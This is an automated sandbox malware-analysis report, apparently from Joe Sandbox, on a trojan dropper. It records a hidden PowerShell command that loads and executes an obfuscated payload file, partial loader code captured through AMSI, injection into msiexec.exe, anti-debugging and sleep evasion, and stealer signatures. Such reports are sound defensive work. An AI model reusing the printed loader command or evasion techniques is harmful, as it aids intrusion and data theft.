            Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll EE052FD5141BF769B841846170AABF0D7C2BB922C74C623C3F109344534F7A70
            Source: WtZl31OLfA.exe, 00000000.00000002.2084984506.0000000000453000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exe | Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exe.1.dr | Binary or memory string: OriginalFilenamelinkeditor.exeDVarFileInfo$ vs WtZl31OLfA.exe
            Source: WtZl31OLfA.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@6/13@2/3
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_004045AF GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00402095 CoCreateInstance
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Users\user\AppData\Local\neoimpressionism
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4764:120:WilError_03
            Source: C:\Windows\SysWOW64\msiexec.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-GC7VQU
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Users\user\AppData\Local\Temp\nsh9381.tmp
            Source: WtZl31OLfA.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: WtZl31OLfA.exe | ReversingLabs: Detection: 57%
            Source: WtZl31OLfA.exe | Virustotal: Detection: 71%
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File read: C:\Users\user\Desktop\WtZl31OLfA.exe
            Source: unknown | Process created: C:\Users\user\Desktop\WtZl31OLfA.exe "C:\Users\user\Desktop\WtZl31OLfA.exe"
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: userenv.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: propsys.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: dwmapi.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: oleacc.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: version.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: shfolder.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: wldp.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: riched20.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: usp10.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: msls31.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: textinputframework.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: coreuicomponents.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: coremessaging.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: ntmarta.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Section loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
            Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: WtZl31OLfA.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %eqm.Core.pdb source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbl source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2296384908.00000000088BF000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: Yara match | File source: 00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: GetDelegateForFunctionPointer((Nowhen $Naalene $Vindspejl), (Nipse @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Volosts0 = [AppDomain]::CurrentDomain.GetAssemblies()$global:Dreegh = (
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Lilina)), $destrueres).DefineDynamicModule($Tylion, $false).DefineType($Bevaege, $Iterative105, [System.MulticastDelegate])$Intermedia
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) "
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 1_2_0794E1A6 push esi; iretd 1_2_0794E1A7
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\msiexec.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8396
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1204
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsi94BB.tmp\nsExec.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6176 | Thread sleep time: -7378697629483816s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652 | Thread sleep count: 2350 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652 | Thread sleep time: -7050000s >= -30000s
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652 | Thread sleep count: 7594 > 30
            Source: C:\Windows\SysWOW64\msiexec.exe TID: 3652 | Thread sleep time: -22782000s >= -30000s
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 0_2_00405841
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_004027FB FindFirstFileW, 0_2_004027FB
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose, 0_2_00406393
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Remove-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Remove-NetEventVmNetworkAdapter@\eq
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Add-NetEventVmNetworkAdapter
            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Add-NetEventVmNetworkAdapter@\eq
            Source: powershell.exe, 00000001.00000002.2281239821.00000000058F0000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Get-NetEventVmNetworkAdapter@\eq
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWL
            Source: ModuleAnalysisCache.1.dr | Binary or memory string: Get-NetEventVmNetworkAdapter
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | API call chain: ExitProcess graph end node graph_0-2865
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | API call chain: ExitProcess graph end node graph_0-3044
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Windows\SysWOW64\msiexec.exe | Thread information set: HideFromDebugger
            Source: C:\Windows\SysWOW64\msiexec.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 42C0000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Manager
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagervQR
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerR
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: |Program Manager|
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00406072 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW

            Stealing of Sensitive Information

            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
